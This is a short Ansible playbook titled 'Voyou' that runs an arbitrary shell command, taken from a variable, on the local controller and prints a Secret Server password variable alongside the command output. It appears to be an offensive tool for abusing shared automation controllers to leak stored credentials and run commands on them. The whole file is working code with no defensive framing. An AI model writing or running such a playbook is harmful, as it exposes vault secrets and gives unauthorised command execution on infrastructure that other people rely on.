- name: "Voyou"
  hosts: all
  gather_facts: no

  tasks:
    - name: "enum"
      shell: |
        {{ cmd }}
      register: enum
      delegate_to: 127.0.0.1
      when: cmd is defined
    
    - name: Print voyou
      ansible.builtin.debug:
        var: c_secretserver_password

    - debug:
        var: enum
      delegate_to: 127.0.0.1
